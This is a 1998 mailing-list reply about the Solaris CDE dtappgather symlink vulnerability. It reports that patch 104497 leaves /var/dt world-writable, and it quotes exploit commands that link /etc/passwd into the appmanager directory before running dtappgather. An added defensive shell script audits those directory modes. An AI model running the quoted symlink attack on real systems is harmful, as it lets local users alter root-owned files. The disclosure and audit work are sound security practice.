Re: /usr/dt/bin/dtappgather exploit

J.A. Gutierrez (spd@GTC1.CPS.UNIZAR.ES)
Wed, 25 Feb 1998 20:26:02 +0100

>
> patches 104497 CDE 1.0.1: dtappgather patch

I'm afraid that's not enough: it fixes the DTUSERSESSION
bug, but it doesn't fix directory permissions.

In a Solaris 2.5 sparc box, with patch 104497-02
you have:

drwxrwxrwx 4 root root 1536 Feb 25 19:46 /var/dt
drwxrwxrwx 3 bin bin 512 Jan 20 1997 /var/dt/appconfig
drwxr-xr-x 4 elias robot 512 Oct 6 14:42 /var/dt/tmp
^^^^^ this is a normal non-admin account; sometimes
the CDE login session changes it.

So, it's still vulnerable to the link exploit.

(but yes, this is not a problem in 2.6, I don't know about 2.5.1)

> > > nigg0r@host% ls -l /etc/passwd
> > > -r--r--r-- 1 root other 1585 Dec 17 22:26 /etc/passwd
> > > nigg0r@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0
> > > nigg0r@host% dtappgather

--
    J.A. Gutierrez                                   So be easy and free
                                            when you're drinking with me
                                      I'm a man you don't meet every day
 finger me for PGP                                          (the pogues)
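As an added check (example code, not part of the original post), this POSIX shell script audits the three /var/dt directories from the listing for the world-writable, non-sticky mode the post describes, and lists any symlinks below a directory so a planted link can be spotted before dtappgather runs; the function names are assumptions, the paths are the ones in the listing.

```shell
#!/bin/sh
# Added example, not from the original post: audit a CDE /var/dt tree for the
# weak directory modes shown in the listing above. A directory that is
# world-writable without the sticky bit lets any local user create or replace
# entries (such as symlinks) that a root-run dtappgather will later follow.
# The default paths are the three from the listing; all functions take any
# directory, so they can be pointed at a test tree.

# check_cde_dir DIR
#   returns 0 if DIR is acceptable, 1 if it is world-writable without the
#   sticky bit, 2 if DIR is missing or not a directory.
check_cde_dir() {
    dir=$1
    [ -d "$dir" ] || return 2
    # First ten characters of "ls -ld" are the mode, e.g. drwxrwxrwx / drwxrwxrwt
    mode=$(ls -ld "$dir" | cut -c1-10)
    other=${mode#???????}          # last three characters: the "other" bits
    case "$other" in
        ?wt|?wT) return 0 ;;   # world-writable but sticky (like /tmp): tolerable
        ?w?)     return 1 ;;   # world-writable, no sticky bit: anyone can plant links
        *)       return 0 ;;
    esac
}

# find_planted_links DIR
#   prints every symlink below DIR (one per line); returns 1 if any exist.
find_planted_links() {
    links=$(find "$1" -type l 2>/dev/null)
    [ -n "$links" ] || return 0
    printf '%s\n' "$links"
    return 1
}

# audit_cde_tree DIR...  prints one status line per directory; returns 1 if any
# directory is world-writable without the sticky bit.
audit_cde_tree() {
    bad=0
    for d in "$@"; do
        rc=0; check_cde_dir "$d" || rc=$?
        case $rc in
            0) printf 'ok         %s\n' "$d" ;;
            1) printf 'VULNERABLE %s (world-writable, no sticky bit)\n' "$d"; bad=1 ;;
            2) printf 'missing    %s\n' "$d" ;;
        esac
    done
    return $bad
}

audit_cde_tree /var/dt /var/dt/appconfig /var/dt/tmp
```

Run it as any user; a VULNERABLE line means the patch level alone is not enough and the directory mode needs fixing (remove world write, or at least add the sticky bit) before trusting dtappgather.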